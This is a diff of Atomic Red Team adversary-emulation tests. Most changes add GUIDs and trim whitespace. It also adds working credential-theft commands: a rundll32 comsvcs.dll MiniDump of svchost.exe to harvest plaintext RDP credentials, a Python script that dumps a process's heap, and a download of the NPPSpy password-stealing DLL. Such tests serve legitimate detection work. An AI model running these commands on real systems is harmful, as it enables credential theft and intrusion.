+    name: sh
+    elevation_required: true
+    command: |
+      sh #{script_path}
+      PID=$(pgrep -n -f "#{pid_term}")
+      PYTHON=$(which python || which python3 || which python2)
+      $PYTHON #{python_script} $PID #{output_file}
+      grep -i "PASS" "#{output_file}"
+    cleanup_command: |
+      rm -f "#{output_file}"
@@ -0,0 +1,31 @@
+#!/usr/bin/env python
+'''Dump a process's heap space to disk
+
+Usage:
+    python dump_proc.py <PID> <filepath>
+'''
+import argparse
+
+
+parser = argparse.ArgumentParser(description='Dump a process\'s heap space to disk')
+parser.add_argument('pid', type=int, help='ID of process to dump')
+parser.add_argument('filepath', help='A filepath to save output to')
+args = parser.parse_args()
+
+process_id = args.pid
+output_file = args.filepath
+
+with open("/proc/{}/maps".format(process_id), "r") as maps_file:
+    # example: 5566db1a6000-5566db4f0000 rw-p 00000000 00:00 0    [heap]
+    heap_line = next(filter(lambda line: "[heap]" in line, maps_file))
+    heap_range = heap_line.split(' ')[0]
+    mem_start = int(heap_range.split('-')[0], 16)
+    mem_stop = int(heap_range.split('-')[1], 16)
+    mem_size = mem_stop - mem_start
+
+with open("/proc/{}/mem".format(process_id), "rb") as mem_file:
+    mem_file.seek(mem_start, 0)
+    heap_mem = mem_file.read(mem_size)
+
+with open(output_file, "wb") as ofile:
+    ofile.write(heap_mem)
@@ -20,10 +20,14 @@ The Linux utility, unshadow, can be used to combine the two files in a format su
 **Supported Platforms:** Linux


+**auto_generated_guid:** 3723ab77-c546-403c-8fb4-bb577033b235
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | Path where captured results will be placed | Path | /tmp/T1003.008.txt|

@@ -54,10 +58,14 @@ rm -f #{output_file}
 **Supported Platforms:** Linux


+**auto_generated_guid:** 60e860b6-8ae6-49db-ad07-5e73edd88f5d
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | Path where captured results will be placed | Path | /tmp/T1003.008.txt|

@@ -11,6 +11,8 @@ Several of the tools mentioned in associated sub-techniques may be used by both

 - [Atomic Test #2 - Credential Dumping with NPPSpy](#atomic-test-2---credential-dumping-with-nppspy)

+- [Atomic Test #3 - Dump svchost.exe to gather RDP credentials](#atomic-test-3---dump-svchostexe-to-gather-rdp-credentials)
+

 <br/>

@@ -27,10 +29,14 @@ If you see a message saying "The system cannot find the path specified", try usi
 **Supported Platforms:** Windows


+**auto_generated_guid:** 96345bfc-8ae7-4b6a-80b7-223200f24ef9
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | gsecdump_exe | Path to the Gsecdump executable | Path | PathToAtomicsFolder&#92;T1003&#92;bin&#92;gsecdump.exe|
 | gsecdump_bin_hash | File hash of the Gsecdump binary file | String | 94CAE63DCBABB71C5DD43F55FD09CAEFFDCD7628A02A112FB3CBA36698EF72BC|
@@ -51,7 +57,7 @@ If you see a message saying "The system cannot find the path specified", try usi
 ##### Description: Gsecdump must exist on disk at specified location (#{gsecdump_exe})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{gsecdump_exe}) {exit 0} else {exit 1} 
+if (Test-Path #{gsecdump_exe}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -78,6 +84,10 @@ NPPSpy Source: https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NP
 **Supported Platforms:** Windows


+**auto_generated_guid:** 9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6
+
+
+



@@ -114,14 +124,52 @@ Remove-Item C:\Windows\System32\NPPSpy.dll -ErrorAction Ignore
 ##### Description: NPPSpy.dll must be available in local temp directory
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path "$env:Temp\NPPSPY.dll") {exit 0} else {exit 1} 
+if (Test-Path "$env:Temp\NPPSPY.dll") {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll -OutFile "$env:Temp\NPPSPY.dll"
 ```




+<br/>
+<br/>
+
+## Atomic Test #3 - Dump svchost.exe to gather RDP credentials
+The svchost.exe contains the RDP plain-text credentials.
+Source: https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/
+
+Upon successful execution, you should see the following file created $env:TEMP\svchost-exe.dmp.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** d400090a-d8ca-4be0-982e-c70598a23de9
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+$ps = (Get-NetTCPConnection -LocalPort 3389 -State Established -ErrorAction Ignore)
+if($ps){$id = $ps[0].OwningProcess} else {$id = (Get-Process svchost)[0].Id }
+C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $id $env:TEMP\svchost-exe.dmp full
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item $env:TEMP\svchost-exe.dmp -ErrorAction Ignore
+```
+
+
+
+
+
 <br/>
@@ -61,6 +61,7 @@ atomic_tests:
  - description: NPPSpy.dll must be available in local temp directory 
    prereq_command: if (Test-Path "$env:Temp\NPPSPY.dll") {exit 0} else {exit 1}
    get_prereq_command: |-
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
      Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll -OutFile "$env:Temp\NPPSPY.dll"
  executor:
    command: |-
@@ -84,3 +85,23 @@ atomic_tests:
      Remove-Item C:\Windows\System32\NPPSpy.dll -ErrorAction Ignore
    name: powershell
    elevation_required: true
+    
+- name: Dump svchost.exe to gather RDP credentials
+  auto_generated_guid: d400090a-d8ca-4be0-982e-c70598a23de9
+  description: |
+    The svchost.exe contains the RDP plain-text credentials.
+    Source: https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/
+    
+    Upon successful execution, you should see the following file created $env:TEMP\svchost-exe.dmp.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      $ps = (Get-NetTCPConnection -LocalPort 3389 -State Established -ErrorAction Ignore)
+      if($ps){$id = $ps[0].OwningProcess} else {$id = (Get-Process svchost)[0].Id }
+      C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $id $env:TEMP\svchost-exe.dmp full
+    cleanup_command: |
+      Remove-Item $env:TEMP\svchost-exe.dmp -ErrorAction Ignore
+    name: powershell
+    elevation_required: true
+
@@ -25,10 +25,14 @@ For a NTFS volume, it should correspond to the following sequence ([NTFS partiti
 **Supported Platforms:** Windows


+**auto_generated_guid:** 88f6327e-51ec-4bbf-b2e8-3fea534eab8b
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | volume | Drive letter of the volume to access | string | C:|

@@ -19,6 +19,10 @@ Upon successful execution, cmd.exe will execute service commands with expected r
 **Supported Platforms:** Windows


+**auto_generated_guid:** 89676ba1-b1f8-47ee-b940-2e1a113ebc71
+
+
+



@@ -47,10 +51,14 @@ Upon successful execution, net.exe will run from cmd.exe that queries services.
 **Supported Platforms:** Windows


+**auto_generated_guid:** 5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | Path of file to hold net.exe output | Path | C:&#92;Windows&#92;Temp&#92;service-list.txt|

@@ -17,10 +17,14 @@ Upon successful execution, powershell will download the .cs from the Atomic Red
 **Supported Platforms:** Windows


+**auto_generated_guid:** fe94a1c3-3e22-4dc9-9fdf-3a8bdbc10dc4
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | input_source_code | Path to source of C# code | path | PathToAtomicsFolder&#92;T1010&#92;src&#92;T1010.cs|
 | output_file_name | Name of output binary | string | %TEMP%&#92;T1010.exe|
@@ -45,7 +49,7 @@ del /f /q /s #{output_file_name} >nul 2>&1
 ##### Description: T1010.cs must exist on disk at specified location (#{input_source_code})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{input_source_code}) {exit 0} else {exit 1} 
+if (Test-Path #{input_source_code}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -23,6 +23,10 @@ https://www.offensive-security.com/wp-content/uploads/2015/04/wp.Registry_Quick_
 **Supported Platforms:** Windows


+**auto_generated_guid:** 8f7578c4-9863-4d83-875c-a565573bbdf0
+
+
+



@@ -21,10 +21,14 @@ Loadable Kernel Module based Rootkit
 **Supported Platforms:** Linux


+**auto_generated_guid:** dfb50072-e45a-4c75-a17e-a484809c8553
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | rootkit_source_path | Path to the rootkit source. Used when prerequistes are fetched. | path | PathToAtomicsFolder/T1014/src/Linux|
 | rootkit_path | Path To rootkit | String | PathToAtomicsFolder/T1014/bin/T1014.ko|
@@ -50,7 +54,7 @@ sudo rmmod #{rootkit_name}
 ##### Description: The kernel module must exist on disk at specified location (#{rootkit_path})
 ##### Check Prereq Commands:
 ```bash
-if [ -f #{rootkit_path} ]; then exit 0; else exit 1; fi; 
+if [ -f #{rootkit_path} ]; then exit 0; else exit 1; fi;
 ```
 ##### Get Prereq Commands:
 ```bash
@@ -73,10 +77,14 @@ Loadable Kernel Module based Rootkit
 **Supported Platforms:** Linux


+**auto_generated_guid:** 75483ef8-f10f-444a-bf02-62eb0e48db6f
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | rootkit_source_path | Path to the rootkit source. Used when prerequistes are fetched. | path | PathToAtomicsFolder/T1014/src/Linux|
 | rootkit_path | Path To rootkit | String | PathToAtomicsFolder/T1014/bin/T1014.ko|
@@ -104,7 +112,7 @@ sudo depmod -a
 ##### Description: The kernel module must exist on disk at specified location (#{rootkit_path})
 ##### Check Prereq Commands:
 ```bash
-if [ -f /lib/modules/$(uname -r)/#{rootkit_name}.ko ]; then exit 0; else exit 1; fi; 
+if [ -f /lib/modules/$(uname -r)/#{rootkit_name}.ko ]; then exit 0; else exit 1; fi;
 ```
 ##### Get Prereq Commands:
 ```bash
@@ -136,10 +144,14 @@ This will simulate hiding a process.
 **Supported Platforms:** Windows


+**auto_generated_guid:** 8e4e1985-9a19-4529-b4b8-b7a49ff87fae
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | driver_path | Path to a vulnerable driver | Path | C:&#92;Drivers&#92;driver.sys|
 | puppetstrings_path | Path of puppetstrings.exe | Path | PathToAtomicsFolder&#92;T1014&#92;bin&#92;puppetstrings.exe|
@@ -159,7 +171,7 @@ This will simulate hiding a process.
 ##### Description: puppetstrings.exe must exist on disk at specified location (#{puppetstrings_path})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{puppetstrings_path}) {exit 0} else {exit 1} 
+if (Test-Path #{puppetstrings_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -33,6 +33,10 @@ Upon successful execution, cmd.exe will spawn multiple commands to list network
 **Supported Platforms:** Windows


+**auto_generated_guid:** 970ab6a1-0157-4f3f-9a73-ec4166754b23
+
+
+



@@ -63,6 +67,10 @@ Upon successful execution, cmd.exe will spawn netsh.exe to list firewall rules.
 **Supported Platforms:** Windows


+**auto_generated_guid:** 038263cb-00f4-4b0a-98ae-0696c67e1752
+
+
+



@@ -89,6 +97,10 @@ Upon successful execution, sh will spawn multiple commands and output will be vi
 **Supported Platforms:** macOS, Linux


+**auto_generated_guid:** c141bbdb-7fca-4254-9fd6-f47e79447e17
+
+
+



@@ -118,6 +130,10 @@ Upon successful execution, cmd.exe will spawn `ipconfig /all`, `net config works
 **Supported Platforms:** Windows


+**auto_generated_guid:** dafaf052-5508-402d-bf77-51e0700c02e2
+
+
+



@@ -148,10 +164,14 @@ Upon successful execution, powershell will read top-128.txt (ports) and contact
 **Supported Platforms:** Windows


+**auto_generated_guid:** 4b467538-f102-491d-ace7-ed487b853bf5
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | Path of file to write port scan results | Path | $env:USERPROFILE&#92;Desktop&#92;open-ports.txt|
 | portfile_url | URL to top-128.txt | Url | https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1016/src/top-128.txt|
@@ -201,7 +221,7 @@ Remove-Item -ErrorAction ignore "#{output_file}"
 ##### Description: Test requires #{port_file} to exist
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path "#{port_file}") {exit 0} else {exit 1} 
+if (Test-Path "#{port_file}") {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -222,10 +242,14 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c
 **Supported Platforms:** Windows


+**auto_generated_guid:** 9bb45dd7-c466-4f93-83a1-be30e56033ee
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | adfind_path | Path to the AdFind executable | Path | PathToAtomicsFolder&#92;T1087.002&#92;src&#92;AdFind.exe|

@@ -244,7 +268,7 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c
 ##### Description: AdFind.exe must exist on disk at specified location (#{adfind_path})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{adfind_path}) {exit 0} else {exit 1} 
+if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -263,10 +287,14 @@ A list of commands known to be performed by Qakbot for recon purposes
 **Supported Platforms:** Windows


+**auto_generated_guid:** 121de5c6-5818-4868-b8a7-8fd07c455c1b
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | recon_commands | File that houses list of commands to be executed | Path | PathToAtomicsFolder&#92;T1016&#92;src&#92;qakbot.bat|

@@ -296,6 +324,10 @@ Using `socketfilterfw`, flags such as --getglobalstate or --listapps can be used
 **Supported Platforms:** macOS


+**auto_generated_guid:** ff1d8c25-2aa4-4f18-a425-fede4a41ee88
+
+
+



@@ -39,6 +39,10 @@ Upon successful execution, cmd.exe will execute `net.exe view` and display resul
 **Supported Platforms:** Windows


+**auto_generated_guid:** 85321a9c-897f-4a60-9f20-29788e50bccd
+
+
+



@@ -66,6 +70,10 @@ Upon successful execution, cmd.exe will execute cmd.exe against Active Directory
 **Supported Platforms:** Windows


+**auto_generated_guid:** f1bf6c8f-9016-4edf-aff9-80b65f5d711f
+
+
+



@@ -92,10 +100,14 @@ Upon successful execution, cmd.exe will execute nltest.exe against a target doma
 **Supported Platforms:** Windows


+**auto_generated_guid:** 52ab5108-3f6f-42fb-8ba3-73bc054f22c8
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | target_domain | Domain to query for domain controllers | String | domain.local|

@@ -123,6 +135,10 @@ Upon successful execution, cmd.exe will perform a for loop against the 192.168.1
 **Supported Platforms:** Windows


+**auto_generated_guid:** 6db1f57f-d1d5-4223-8a66-55c9c65a9592
+
+
+



@@ -149,6 +165,10 @@ Upon successful execution, cmd.exe will execute arp to list out the arp cache. O
 **Supported Platforms:** Windows


+**auto_generated_guid:** 2d5a61f5-0447-4be4-944a-1f8530ed6574
+
+
+



@@ -175,6 +195,10 @@ Upon successful execution, sh will execute arp to list out the arp cache. Output
 **Supported Platforms:** Linux, macOS


+**auto_generated_guid:** acb6b1ff-e2ad-4d64-806c-6c35fe73b951
+
+
+



@@ -192,7 +216,7 @@ arp -a | grep -v '^?'
 ##### Description: Check if arp command exists on the machine
 ##### Check Prereq Commands:
 ```sh
-if [ -x "$(command -v arp)" ]; then exit 0; else exit 1; fi; 
+if [ -x "$(command -v arp)" ]; then exit 0; else exit 1; fi;
 ```
 ##### Get Prereq Commands:
 ```sh
@@ -213,10 +237,14 @@ Upon successful execution, sh will perform a ping sweep on the 192.168.1.1/24 an
 **Supported Platforms:** Linux, macOS


+**auto_generated_guid:** 96db2632-8417-4dbb-b8bb-a8b92ba391de
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | start_host | Subnet used for ping sweep. | string | 1|
 | stop_host | Subnet used for ping sweep. | string | 254|
@@ -246,6 +274,10 @@ Upon successful execution, powershell will identify the ip range (via ipconfig)
 **Supported Platforms:** Windows


+**auto_generated_guid:** baa01aaa-5e13-45ec-8a0d-e46c93c9760f
+
+
+



@@ -277,10 +309,14 @@ Successful execution of this test will list dns zones in the terminal.
 **Supported Platforms:** Windows


+**auto_generated_guid:** 95e19466-469e-4316-86d2-1dc401b5a959
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | user_name | username including domain. | string | domain&#92;user|
 | acct_pass | Account password. | string | password|
@@ -301,7 +337,7 @@ adidnsdump -u #{user_name} -p #{acct_pass} --print-zones #{host_name}
 ##### Description: Computer must have python 3 installed
 ##### Check Prereq Commands:
 ```powershell
-if (python --version) {exit 0} else {exit 1} 
+if (python --version) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -310,7 +346,7 @@ echo "Python 3 must be installed manually"
 ##### Description: Computer must have pip installed
 ##### Check Prereq Commands:
 ```powershell
-if (pip3 -V) {exit 0} else {exit 1} 
+if (pip3 -V) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -319,7 +355,7 @@ echo "PIP must be installed manually"
 ##### Description: adidnsdump must be installed and part of PATH
 ##### Check Prereq Commands:
 ```powershell
-if (cmd /c adidnsdump -h) {exit 0} else {exit 1} 
+if (cmd /c adidnsdump -h) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -339,10 +375,14 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c
 **Supported Platforms:** Windows


+**auto_generated_guid:** a889f5be-2d54-4050-bd05-884578748bb4
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | adfind_path | Path to the AdFind executable | Path | PathToAtomicsFolder&#92;T1087.002&#92;src&#92;AdFind.exe|

@@ -361,7 +401,7 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c
 ##### Description: AdFind.exe must exist on disk at specified location (#{adfind_path})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{adfind_path}) {exit 0} else {exit 1} 
+if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -381,10 +421,14 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c
 **Supported Platforms:** Windows


+**auto_generated_guid:** 5838c31e-a0e2-4b9f-b60a-d79d2cb7995e
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | adfind_path | Path to the AdFind executable | Path | PathToAtomicsFolder&#92;T1087.002&#92;src&#92;AdFind.exe|

@@ -403,7 +447,7 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c
 ##### Description: AdFind.exe must exist on disk at specified location (#{adfind_path})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{adfind_path}) {exit 0} else {exit 1} 
+if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -19,10 +19,14 @@ Deletes a created file
 **Supported Platforms:** Windows


+**auto_generated_guid:** 9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | file | Exfiltration File | String | C:&#92;temp&#92;T1020_exfilFile.txt|
 | domain | Destination Domain | url | https://google.com|
@@ -21,10 +21,14 @@ Attempt an RDP session via Remote Desktop Application to a DomainController.
 **Supported Platforms:** Windows


+**auto_generated_guid:** 355d4632-8cb9-449d-91ce-b566d0253d3e
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | logonserver | ComputerName argument default %logonserver% | String | $ENV:logonserver.TrimStart("&#92;")|
 | domain | domain argument default %USERDOMAIN% | String | $Env:USERDOMAIN|
@@ -56,7 +60,7 @@ if(-not ([string]::IsNullOrEmpty($p.PID))) { Stop-Process -Id $p.PID }
 ##### Description: Computer must be domain joined
 ##### Check Prereq Commands:
 ```powershell
-if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) { exit 0} else { exit 1} 
+if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) { exit 0} else { exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -75,10 +79,14 @@ Attempt an RDP session via Remote Desktop Application over Powershell
 **Supported Platforms:** Windows


+**auto_generated_guid:** 7382a43e-f19c-46be-8f09-5c63af7d3e2b
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | logonserver | ComputerName | String | WIN-DC|
 | username | Username | String | Administrator|
@@ -25,10 +25,14 @@ Connecting To Remote Shares
 **Supported Platforms:** Windows


+**auto_generated_guid:** 3386975b-367a-4fbb-9d77-4dcf3639ffd3
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | user_name | Username | String | DOMAIN&#92;Administrator|
 | share_name | Examples C$, IPC$, Admin$ | String | C$|
@@ -57,10 +61,14 @@ Map Admin share utilizing PowerShell
 **Supported Platforms:** Windows


+**auto_generated_guid:** 514e9cd7-9207-4882-98b1-c8f791bae3c5
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | share_name | Examples C$, IPC$, Admin$ | String | C$|
 | map_name | Mapped Drive Letter | String | g|
@@ -88,10 +96,14 @@ Copies a file to a remote host and executes it using PsExec. Requires the downlo
 **Supported Platforms:** Windows


+**auto_generated_guid:** 0eb03d41-79e4-4393-8e57-6344856be1cf
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | command_path | File to copy and execute | Path | C:&#92;Windows&#92;System32&#92;cmd.exe|
 | remote_host | Remote computer to receive the copy and execute the file | String | &#92;&#92;localhost|
@@ -112,7 +124,7 @@ Copies a file to a remote host and executes it using PsExec. Requires the downlo
 ##### Description: PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1} 
+if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -135,10 +147,14 @@ This technique is used by post-exploitation frameworks.
 **Supported Platforms:** Windows


+**auto_generated_guid:** d41aaab5-bdfe-431d-a3d5-c29e9136ff46
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | Remote computer to receive the copy and execute the file | String | output.txt|
 | command_to_execute | Command to execute for output. | String | hostname|
@@ -27,10 +27,14 @@ Upon successful execution, cmd will spawn calc.exe on a remote computer.
 **Supported Platforms:** Windows


+**auto_generated_guid:** 6dc74eb1-c9d6-4c53-b3b5-6f50ae339673
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | computer_name | Name of Computer | string | localhost|

@@ -23,6 +23,10 @@ Upon successful execution, powershell will "Enable-PSRemoting" allowing for remo
 **Supported Platforms:** Windows


+**auto_generated_guid:** 9059e8de-3d7d-4954-a322-46161880b9cf
+
+
+



@@ -49,10 +53,14 @@ Upon successful execution, powershell will execute ipconfig on localhost using `
 **Supported Platforms:** Windows


+**auto_generated_guid:** 5295bd61-bd7e-4744-9d52-85962a4cf2d6
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | host_name | Remote Windows Host Name | String | localhost|
 | remote_command | Command to execute on remote Host | String | ipconfig|
@@ -79,10 +87,14 @@ An adversary may attempt to use Evil-WinRM with a valid account to interact with
 **Supported Platforms:** Windows


+**auto_generated_guid:** efe86d95-44c4-4509-ae42-7bfd9d1f5b3d
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | user_name | Username | string | Domain&#92;Administrator|
 | destination_address | Remote Host IP or Hostname | string | Target|
@@ -103,7 +115,7 @@ evil-winrm -i #{destination_address} -u #{user_name} -p #{password}
 ##### Description: Computer must have Ruby Installed
 ##### Check Prereq Commands:
 ```powershell
-if (ruby -v) {exit 0} else {exit 1} 
+if (ruby -v) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -114,7 +126,7 @@ Start-Process $file1 /S;
 ##### Description: Computer must have Evil-WinRM installed
 ##### Check Prereq Commands:
 ```powershell
-if (evil-winrm -h) {exit 0} else {exit 1} 
+if (evil-winrm -h) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -19,10 +19,14 @@ Upon successful execution, dd will modify `/tmp/evil-binary`, therefore the expe
 **Supported Platforms:** macOS, Linux


+**auto_generated_guid:** ffe2346c-abd5-4b45-a713-bf5f1ebd573a
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | file_to_pad | Path of binary to be padded | Path | /tmp/evil-binary|

@@ -45,7 +49,7 @@ rm #{file_to_pad}
 ##### Description: The binary must exist on disk at specified location (#{file_to_pad})
 ##### Check Prereq Commands:
 ```bash
-if [ -f #{file_to_pad} ]; then exit 0; else exit 1; fi; 
+if [ -f #{file_to_pad} ]; then exit 0; else exit 1; fi;
 ```
 ##### Get Prereq Commands:
 ```bash
@@ -24,10 +24,14 @@ No other protection/compression were applied.
 **Supported Platforms:** Linux


+**auto_generated_guid:** 11c46cd8-e471-450e-acb8-52a1216ae6a4
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | bin_path | Packed binary | Path | PathToAtomicsFolder/T1027.002/bin/linux/test_upx|

@@ -60,10 +64,14 @@ by some methods, and especially UPX is not able to uncompress it any more.
 **Supported Platforms:** Linux


+**auto_generated_guid:** f06197f8-ff46-48c2-a0c6-afc1b50665e1
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | bin_path | Packed binary | Path | PathToAtomicsFolder/T1027.002/bin/linux/test_upx_header_changed|

@@ -94,10 +102,14 @@ No other protection/compression were applied.
 **Supported Platforms:** macOS


+**auto_generated_guid:** b16ef901-00bb-4dda-b4fc-a04db5067e20
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | bin_path | Packed binary | Path | PathToAtomicsFolder/T1027.002/bin/darwin/test_upx|

@@ -130,10 +142,14 @@ by some methods, and especially UPX is not able to uncompress it any more.
 **Supported Platforms:** macOS


+**auto_generated_guid:** 4d46e16b-5765-4046-9f25-a600d3e65e4d
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | bin_path | Packed binary | Path | PathToAtomicsFolder/T1027.002/bin/darwin/test_upx_header_changed|

@@ -20,10 +20,14 @@ Upon execution an exe named T1027.004.exe will be placed in the temp folder
 **Supported Platforms:** Windows


+**auto_generated_guid:** ffcdbd6a-b0e8-487d-927a-09127fe9a206
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | Output compiled binary | Path | C:&#92;Windows&#92;Temp&#92;T1027.004.exe|
 | input_file | C# code that launches calc.exe from a hidden cmd.exe Window | Path | PathToAtomicsFolder&#92;T1027.004&#92;src&#92;calc.cs|
@@ -47,7 +51,7 @@ del #{output_file} >nul 2>&1
 ##### Description: C# file must exist on disk at specified location (#{input_file})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{input_file}) {exit 0} else {exit 1} 
+if (Test-Path #{input_file}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -70,10 +74,14 @@ Upon execution, the exe will print 'T1027.004 Dynamic Compile'.
 **Supported Platforms:** Windows


+**auto_generated_guid:** 453614d8-3ba6-4147-acc0-7ec4b3e1faef
+
+
+
